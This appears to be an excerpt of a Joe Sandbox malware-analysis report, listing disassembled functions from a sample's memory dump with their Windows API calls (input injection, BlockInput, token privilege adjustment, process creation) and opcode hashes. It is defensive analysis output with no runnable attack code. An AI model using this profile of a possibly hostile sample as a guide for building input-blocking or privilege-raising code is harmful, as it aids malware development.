                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: 79a98988c4d8816bee0d745875b42cf217f847a51d8835f0d7b5f71a1523971c
                                              • Instruction ID: 0edefd76fafe4bed0305437d30742cda62cd971dd24075474fe52021c2e75d8c
                                              • Opcode Fuzzy Hash: 79a98988c4d8816bee0d745875b42cf217f847a51d8835f0d7b5f71a1523971c
                                              • Instruction Fuzzy Hash: 0FF0E5B16052286AEB2027A78C4DFEB7AAEEFC4761F000265F509E3291D9609948C7B0
                                              Function 00E09400 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00E09423
                                              • NtdllDialogWndProc_W.NTDLL(?,00000200,?,00000000,?,?,00000000,00000000,?,00DC776C,?,?,?,?,?), ref: 00E0944C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClientDialogNtdllProc_Screen
                                              • String ID:
                                              • API String ID: 3420055661-0
                                              • Opcode ID: e88ca94ba1b6fd94392825610de6ae5d3a8556c10a03d10f04e453bec8723221
                                              • Instruction ID: 1ea7373cd757b3b3d5672ea9acfbf88e33650016d560b3d3a33750b5a93e9b6a
                                              • Opcode Fuzzy Hash: e88ca94ba1b6fd94392825610de6ae5d3a8556c10a03d10f04e453bec8723221
                                              • Instruction Fuzzy Hash: FCF03A76400218FFEF048F52DC49DAE7BB8FB44351F10415AF905B21A1D376AA95DB60
                                              Function 00DDB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DDB25D
                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00DDB270
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: InputSendkeybd_event
                                              • String ID:
                                              • API String ID: 3536248340-0
                                              • Opcode ID: e91a643179127577aa8c5a536bde3c42f98a139398517c826399387e7661dddd
                                              • Instruction ID: 96a823cb0991fd309460c14064f4b38da210a44a244286576024d083f280afc3
                                              • Opcode Fuzzy Hash: e91a643179127577aa8c5a536bde3c42f98a139398517c826399387e7661dddd
                                              • Instruction Fuzzy Hash: 69F01D7580424DAFDB059FA1C805BAE7FB4FF08319F14800AF955A5191C379C6559FA4
                                              Function 00DD10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                              Download Yara Rule
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD11FC), ref: 00DD10D4
                                              • CloseHandle.KERNEL32(?,?,00DD11FC), ref: 00DD10E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: 5a7ae42d57fba4470d2a891b80e44a240f1756529ef57232640f72f3f3de5d28
                                              • Instruction ID: 0fbb2c705fa46957dcce23864f8f43d16586543ffa24a737cd469e87bbb0730c
                                              • Opcode Fuzzy Hash: 5a7ae42d57fba4470d2a891b80e44a240f1756529ef57232640f72f3f3de5d28
                                              • Instruction Fuzzy Hash: D5E0BF72014611FEE7252B51FC05E7777A9EB04311B24892EF5A5905B1DB626CE0DB60
                                              Function 00E0953A Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E09542
                                              • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00DC76FB,?,?,?,?), ref: 00E0956C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: cc5c178e57c9988af3e2f2327ef5d7bd3f6e88978186e0e0af97a78344dc2adb
                                              • Instruction ID: 93f77417c3a7dd801b2c41eeeb5b358928ec3ff80b6bbf545865f1aae74fcda4
                                              • Opcode Fuzzy Hash: cc5c178e57c9988af3e2f2327ef5d7bd3f6e88978186e0e0af97a78344dc2adb
                                              • Instruction Fuzzy Hash: 64E08670104214BBFB150F1AEC19FB93B14F700B91F104215F957A80E2D7B295D0D260
                                              Function 00DA676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DA6766,?,?,00000008,?,?,00DAFEFE,00000000), ref: 00DA6998
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 74e4b672e2df45a8de248d6d7e85e94e8e1c4fe8c0b8f61d92eb076b70dc3f11
                                              • Instruction ID: 52b66fe9be60e234bf1cbb76c70e2f021c54f37ad46933e7aa4a7d8118a7e087
                                              • Opcode Fuzzy Hash: 74e4b672e2df45a8de248d6d7e85e94e8e1c4fe8c0b8f61d92eb076b70dc3f11
                                              • Instruction Fuzzy Hash: A4B11835610608DFD715CF28C48AB657BA0FF46364F2D8658E89ACF2E2C739E991CB50
                                              Function 00D8B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: e9ae90f4be1abe80c7f906986c7d2212eee355f8f3234b6940904a31f1c9ac22
                                              • Instruction ID: 3b03138f874bb8f8d768349b0c1771080a0988188947bdff6048a5dd16f1f40c
                                              • Opcode Fuzzy Hash: e9ae90f4be1abe80c7f906986c7d2212eee355f8f3234b6940904a31f1c9ac22
                                              • Instruction Fuzzy Hash: 9E1230719002299FDB14DF58C881BEEB7B5FF48710F1481AAE849EB255DB349A81DFA0
                                              Function 00E0A2D7 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00E0A38F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: c8a959689e9633ed450157d0d2d1ad3fe7c2696649e951345ea31563a9510f38
                                              • Instruction ID: b9aad2c580c0b3421c11735fc9bad369c9a628d94cf4c747f8f2d2d2e8adc60a
                                              • Opcode Fuzzy Hash: c8a959689e9633ed450157d0d2d1ad3fe7c2696649e951345ea31563a9510f38
                                              • Instruction Fuzzy Hash: 4B1156302007596AFB391B28CC1AFBC3680DB81724F289338FA113A1E1C7685DC0C262
                                              Function 00E087B2 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00E087F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$CallLongProc
                                              • String ID:
                                              • API String ID: 4084987330-0
                                              • Opcode ID: f5e5104734482e3f7ec9af923ddc4257cabb2f0af563fd8524b30fdf74e8b3b6
                                              • Instruction ID: a9d68b91c2b97587a0568f78068853eac506e058395332db46483e9c7ef86632
                                              • Opcode Fuzzy Hash: f5e5104734482e3f7ec9af923ddc4257cabb2f0af563fd8524b30fdf74e8b3b6
                                              • Instruction Fuzzy Hash: 13F04935104108EFCF05AF55ED54CB93BAAEB09360B548515F991AA6A1CB32ACE0EFA0
                                              Function 00E08AAA Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                                • Part of subcall function 00D8912D: GetCursorPos.USER32(?), ref: 00D89141
                                                • Part of subcall function 00D8912D: ScreenToClient.USER32(00000000,?), ref: 00D8915E
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000001), ref: 00D89183
                                                • Part of subcall function 00D8912D: GetAsyncKeyState.USER32(00000002), ref: 00D8919D
                                              • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00DC7818,?,?,?,?,?,00000001,?), ref: 00E08AF8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                              • String ID:
                                              • API String ID: 2356834413-0
                                              • Opcode ID: 2df7b8d715e3227c6d8412f27552c4ae166c87a4ae7ec934da99bbb7b4c45fd9
                                              • Instruction ID: 4082cfffb989165ecfeda6da478f3edd29f22a8611e2602d972fc6b1cc87b423
                                              • Opcode Fuzzy Hash: 2df7b8d715e3227c6d8412f27552c4ae166c87a4ae7ec934da99bbb7b4c45fd9
                                              • Instruction Fuzzy Hash: C5F08230200229ABEF14AF55DC1AABA3F65EB40790F000115F9562A192CBB2A9E0DBE4
                                              Function 00D89052 Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00D89096
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: 11e254bd7cba40264e4f8811e20998fda4bacefd157322c05e3f0a2ce1112987
                                              • Instruction ID: bdad2c0653616213ad1b162f60a7d39365263191a3a6685b19bc353362d8e1f6
                                              • Opcode Fuzzy Hash: 11e254bd7cba40264e4f8811e20998fda4bacefd157322c05e3f0a2ce1112987
                                              • Instruction Fuzzy Hash: EAF05434600218AFDF189F16D8656753762FB86351F24415CF8521A2E0C73399D1D760
                                              Function 00DEEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00DEEABD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: b6454a49fdd6554605e6a8f31cf14e31c6261dbe2f474354d2379939bfe20e65
                                              • Instruction ID: 67c3157f258b1b80a09b76ac6a67b2d7f66bda428fa2641fb9d43a3863d31987
                                              • Opcode Fuzzy Hash: b6454a49fdd6554605e6a8f31cf14e31c6261dbe2f474354d2379939bfe20e65
                                              • Instruction Fuzzy Hash: B0E01A312102049FC710EF6AD804E9AF7E9EF98764F00842AFC49D7291EB71E8408BB0
                                              Function 00E09380 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00E093C0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DialogNtdllProc_
                                              • String ID:
                                              • API String ID: 3239928679-0
                                              • Opcode ID: e3ef9be965e69dac58cd2d1a9cb6ef774647aae681970de239d56581fbfa68f4
                                              • Instruction ID: 266c753d65d2523807a941f8756c34119a0feffbc5103adbe8a5d86e30a26acc
                                              • Opcode Fuzzy Hash: e3ef9be965e69dac58cd2d1a9cb6ef774647aae681970de239d56581fbfa68f4
                                              • Instruction Fuzzy Hash: 9FF06D31200294BFEB21DF58EC09FC67BA5EB0A360F144148FA25372E2CB7179A0DB60
                                              Function 00D890A7 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00D890D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 2065330234-0
                                              • Opcode ID: 1a2f8a3d6f9ce4fad0a1ba8af9b6caaa56a9fd93850216d7b34b83027d31ffdb
                                              • Instruction ID: 1753421feb9f4e75e8ef8f51c2625d7e0fb9dd0cf9855fbf75e08753a21f7a74
                                              • Opcode Fuzzy Hash: 1a2f8a3d6f9ce4fad0a1ba8af9b6caaa56a9fd93850216d7b34b83027d31ffdb
                                              • Instruction Fuzzy Hash: CFE01235600204FFDF15AF91EC66E647B26FB89350F148158FA552A2A1CB33B9A2DB60
                                              Function 00E093CB Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00DC7723,?,?,?,?,?,?), ref: 00E093F6
                                                • Part of subcall function 00E08172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43018,00E4305C), ref: 00E081BF
                                                • Part of subcall function 00E08172: CloseHandle.KERNEL32 ref: 00E081D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseCreateDialogHandleNtdllProc_Process
                                              • String ID:
                                              • API String ID: 4178364262-0
                                              • Opcode ID: 5a238ab167399f105ff6094a06bc72ddbc280630fd6198487251a8d07e823e00
                                              • Instruction ID: bc13a40e899601369d322497e1bb0e3177f73ce6286bdcb971514f423536e913
                                              • Opcode Fuzzy Hash: 5a238ab167399f105ff6094a06bc72ddbc280630fd6198487251a8d07e823e00
                                              • Instruction Fuzzy Hash: CBE04635100208EFCB01AF15EC64E863BB2FB08351F004144FA11272F2CB32A9E1EF10
                                              Function 00D88BA4 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                                • Part of subcall function 00D88BCD: DestroyWindow.USER32(?), ref: 00D88C81
                                                • Part of subcall function 00D88BCD: KillTimer.USER32(00000000,?,?,?,?,00D88BBA,00000000,?), ref: 00D88D1B
                                              • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00D88BC3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
